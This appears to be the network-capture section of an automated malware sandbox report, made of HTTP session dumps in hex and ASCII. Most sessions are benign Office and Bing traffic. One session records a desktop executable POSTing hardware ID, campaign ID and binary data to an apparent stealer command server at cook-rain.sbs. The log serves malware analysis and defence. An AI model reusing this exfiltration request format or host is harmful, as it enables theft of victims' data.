                                                                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0WFMkD51Et5%2FYKEAhkb7rKGKHnVoWYn0n3PxCYRfBYiULxaYI2rKjUOIlk576Afr4F%2FEH6Q2QX2pyQnpV%2BZB%2FmrTpXuNRFuPj87XO64E3%2B4yXeHCPaWhDpGlRhSZlT8%2F"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8e614d7078078c6c-EWR
                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1879&sent=11&recv=20&lost=0&retrans=0&sent_bytes=2830&recv_bytes=16006&delivery_rate=1612368&cwnd=168&unsent_bytes=0&cid=f4f1dd4091d4fbd1&ts=891&x=0"
                                                                                                                                                                                                            2024-11-21 14:17:18 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                                                                                                                                                            Data Ascii: eok 8.46.123.75
                                                                                                                                                                                                            2024-11-21 14:17:18 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            23192.168.2.64973413.107.246.45443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-21 14:17:19 UTC192OUTGET /rules/rule120611v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-21 14:17:20 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 14:17:19 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 415
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:56 GMT
                                                                                                                                                                                                            ETag: "0x8DC582B9F6F3512"
                                                                                                                                                                                                            x-ms-request-id: a6bfa609-001e-00a2-4d66-3bd4d5000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241121T141719Z-178bfbc474bbcwv4hC1NYCypys00000001hg0000000001aq
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-21 14:17:20 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4c 6c 5d 5b 45 65 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 56 76 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120611" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <SR T="2" R="([Ll][Ee][Nn][Oo][Vv][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            24192.168.2.64973713.107.246.45443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-21 14:17:19 UTC192OUTGET /rules/rule120614v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-21 14:17:20 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 14:17:19 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 467
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BA6C038BC"
                                                                                                                                                                                                            x-ms-request-id: 3af01634-701e-000d-3dd2-3b6de3000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241121T141719Z-r1d97b99577tssmjhC1TEB8kan0000000aa000000000dt6t
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-21 14:17:20 UTC467INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120614" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            25192.168.2.64973313.107.246.45443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-21 14:17:19 UTC192OUTGET /rules/rule120610v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-21 14:17:20 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 14:17:19 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 474
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:46 GMT
                                                                                                                                                                                                            ETag: "0x8DC582B9964B277"
                                                                                                                                                                                                            x-ms-request-id: 3126d9de-f01e-0099-4d8c-3a9171000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241121T141719Z-1777c6cb754lv4cqhC1TEB13us0000000b6g00000000atw2
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-21 14:17:20 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120610" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            26192.168.2.64973513.107.246.45443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-21 14:17:19 UTC192OUTGET /rules/rule120613v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-21 14:17:20 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 14:17:19 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 632
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BB6E3779E"
                                                                                                                                                                                                            x-ms-request-id: b54876a2-a01e-0070-6764-3b573b000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241121T141719Z-178bfbc474bw8bwphC1NYC38b400000001cg00000000frfv
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-21 14:17:20 UTC632INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 48 68 5d 5b 50 70 5d 28 5b 5e 45 5d 7c 24 29 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 33 22 20 52 3d 22 28 5b 48 68 5d 5b 45 65 5d 5b 57 77 5d 5b 4c 6c 5d 5b 45 65 5d
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120613" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <SR T="2" R="^([Hh][Pp]([^E]|$))"> <S T="1" F="1" M="Ignore" /> </SR> <SR T="3" R="([Hh][Ee][Ww][Ll][Ee]


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            27192.168.2.64973613.107.246.45443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-21 14:17:19 UTC192OUTGET /rules/rule120612v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-21 14:17:20 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 14:17:19 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 471
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:25 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BB10C598B"
                                                                                                                                                                                                            x-ms-request-id: 1e988f1d-b01e-0070-1b8c-3a1cc0000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241121T141719Z-1777c6cb754j47wfhC1TEB5wrw000000071000000000c6wx
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-21 14:17:20 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120612" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            28192.168.2.649739188.114.97.34434784C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-21 14:17:20 UTC275OUTPOST /api HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=8JOY4UJ9I5W1BJ
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                            Content-Length: 19945
                                                                                                                                                                                                            Host: cook-rain.sbs
                                                                                                                                                                                                            2024-11-21 14:17:20 UTC15331OUTData Raw: 2d 2d 38 4a 4f 59 34 55 4a 39 49 35 57 31 42 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 32 35 34 32 45 37 33 34 39 32 46 45 32 41 43 34 41 46 46 35 41 44 45 43 39 45 36 42 44 37 37 0d 0a 2d 2d 38 4a 4f 59 34 55 4a 39 49 35 57 31 42 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 38 4a 4f 59 34 55 4a 39 49 35 57 31 42 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 38 4a
                                                                                                                                                                                                            Data Ascii: --8JOY4UJ9I5W1BJContent-Disposition: form-data; name="hwid"12542E73492FE2AC4AFF5ADEC9E6BD77--8JOY4UJ9I5W1BJContent-Disposition: form-data; name="pid"3--8JOY4UJ9I5W1BJContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--8J
                                                                                                                                                                                                            2024-11-21 14:17:20 UTC4614OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8d 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8b 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8d 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 b1 e8 ef fa 6f c5 82 3f 0c fe 4d 70 35 98 09 ee b9 f1 d3 1b 7f 70 e3 5f de a8 de f8 f4 8d d8 f5 6f 86 49 00 00 00 00 00 00
                                                                                                                                                                                                            Data Ascii: +?2+?2+?o?Mp5p_oI
                                                                                                                                                                                                            2024-11-21 14:17:21 UTC980INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 14:17:21 GMT
                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Set-Cookie: PHPSESSID=85r4fgi93toah55am988ao76kg; expires=Mon, 17-Mar-2025 08:04:00 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FNk54hBcKkS8znFDmdZLBOKXd18MWvWG1N9RZ1nRbSXQtYl4n6k9R5xoDlUHn4dx1VJnsK3ocuI6roMUWoyY3fusx0NgNWibEqVhSKMxtSpIG%2BtP0KXcIXqggfd906cg"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8e614d8128f94334-EWR
                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1606&sent=11&recv=23&lost=0&retrans=0&sent_bytes=2830&recv_bytes=20900&delivery_rate=1799137&cwnd=224&unsent_bytes=0&cid=a679a66423921775&ts=867&x=0"
                                                                                                                                                                                                            2024-11-21 14:17:21 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                                                                                                                                                            Data Ascii: eok 8.46.123.75
                                                                                                                                                                                                            2024-11-21 14:17:21 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            29192.168.2.649740150.171.28.10443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-21 14:17:21 UTC375OUTGET /th?id=OADD2.10239339388107_1RNTUVYHPUHJQ1IFH&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/1.1
                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
                                                                                                                                                                                                            Host: tse1.mm.bing.net
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            2024-11-21 14:17:21 UTC854INHTTP/1.1 200 OK
                                                                                                                                                                                                            Cache-Control: public, max-age=2592000
                                                                                                                                                                                                            Content-Length: 818153
                                                                                                                                                                                                            Content-Type: image/jpeg
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                                            Access-Control-Allow-Headers: *
                                                                                                                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                                                                                            Timing-Allow-Origin: *
                                                                                                                                                                                                            Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
                                                                                                                                                                                                            NEL: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                            X-MSEdge-Ref: Ref A: 6A4608B1649B48FE8143CB81788835D2 Ref B: EWR30EDGE1613 Ref C: 2024-11-21T14:17:21Z
                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 14:17:21 GMT
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            2024-11-21 14:17:21 UTC15530INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff e1 19 4a 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 07 01 12 00 03 00 00 00 01 00 01 00 00 01 1a 00 05 00 00 00 01 00 00 00 62 01 1b 00 05 00 00 00 01 00 00 00 6a 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 1f 00 00 00 72 01 32 00 02 00 00 00 14 00 00 00 92 87 69 00 04 00 00 00 01 00 00 00 a6 00 00 00 d2 00 60 00 00 00 01 00 00 00 60 00 00 00 01 00 00 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 32 33 2e 35 20 28 57 69 6e 64 6f 77 73 29 00 00 32 30 32 32 3a 31 30 3a 30 33 20 31 31 3a 35 30 3a 33 32 00 00 03 a0 01 00 03 00 00 00 01 ff ff 00 00 a0 02 00 04 00 00 00 01 00 00 07 80 a0 03 00 04 00 00 00 01 00 00 04 38 00 00 00 00 00 00 00 06 01 03 00 03 00 00 00 01 00 06 00 00 01
                                                                                                                                                                                                            Data Ascii: JFIF``JExifMM*bj(1r2i``Adobe Photoshop 23.5 (Windows)2022:10:03 11:50:328
                                                                                                                                                                                                            2024-11-21 14:17:21 UTC16384INData Raw: fe 8d 61 2c 9f 7f cb 4e ad b3 f7 b8 a7 28 e8 69 4f 4e bb 9d af ec bd 05 dd 8c 32 5a ea f7 90 c9 63 a2 dc cd 24 76 df c1 6f b6 67 ff 00 4a 95 db f8 63 8f ee ad 73 7f 15 b5 eb af 06 f8 db 5a f1 e5 b1 d3 ac 6d 3c 77 a5 4d 7f a7 5b dc cb b5 e3 96 db f7 7b 5b fb 92 dc 44 db ff 00 4a e8 7c 39 a7 ea 5e 2d f8 91 26 91 a7 4d 69 6f a3 de c6 fa bc 96 56 d1 7c 93 de db 22 7f a0 bb ff 00 12 bc 5e 5c 8c 2b 96 fd ac 2d ad bc 6b f0 ed e3 f0 9e 85 a7 ea 13 59 db 7f 69 ea 7a b0 89 de e7 cd 5f f5 91 ab 7d 2b 18 c5 2a ba ec 6f 52 4d 51 b2 dd 1c 27 ec cb 3d a3 68 be 0e d2 2d cc 37 9a c6 a3 e2 2b bf b3 7e ed f7 e9 9f b8 0b e7 ff 00 b5 8f bc 2b df 7c 41 73 60 fa 7c 6f 07 9d a8 dd 47 24 d6 97 b7 31 7d fb ff 00 33 e5 8e 45 fe f3 bf 7f ee 57 cc 9f b2 7e a9 04 df 11 bc 23 a3 da d9
                                                                                                                                                                                                            Data Ascii: a,N(iON2Zc$vogJcsZm<wM[{[DJ|9^-&MioV|"^\+-kYiz_}+*oRMQ'=h-7+~+|As`|oG$1}3EW~#
                                                                                                                                                                                                            2024-11-21 14:17:21 UTC16384INData Raw: 9f c3 54 d7 bb 71 46 4b 98 bd e2 06 bb 58 6c 6e 93 f7 72 49 a9 24 7e 67 fc f3 dd f2 53 7c 2b 14 0f f6 67 83 fe 3d 6c a3 ff 00 8f 99 7f be cf f3 6d aa fa c5 b4 9a 9c 32 5a cf 37 ee ec b7 dd ff 00 e3 9e 62 56 97 c3 db c8 35 df 86 f6 d3 27 fa 89 23 7f 2e 48 bf d9 77 db b2 a7 94 be 6b 32 c4 17 91 a7 88 6d 9f fe 82 3b e3 ff 00 be 7e e5 4f e2 08 36 7d 9b 51 ff 00 59 fd 9d 73 e6 49 1f fc f4 89 be fa d6 0d ad cc 0f a8 69 33 49 34 3f 6a 92 ca 69 3f ef 9f bb ff 00 02 ae b7 49 b9 92 ee 1d f3 ff 00 db 3a 80 e8 7c f7 e3 1b 3f b5 ea d7 de 10 79 a1 fe ca b8 d3 75 2b bd 37 fe 9e 37 7e fe 35 ff 00 b6 73 54 9e 31 be 8f 44 f8 7b 73 ad e9 7a 94 d1 ea 5a d6 93 6d 25 b4 7f f3 f6 92 a7 cc 9f ef c6 db eb 5f f6 85 f0 e6 9b a7 f9 7a ee 97 e7 59 6a 3e 19 b9 4b 88 e4 f3 be 49 2c a7
                                                                                                                                                                                                            Data Ascii: TqFKXlnrI$~gS|+g=lm2Z7bV5'#.Hwk2m;~O6}QYsIi3I4?ji?I:|?yu+77~5sT1D{szZm%_zYj>KI,
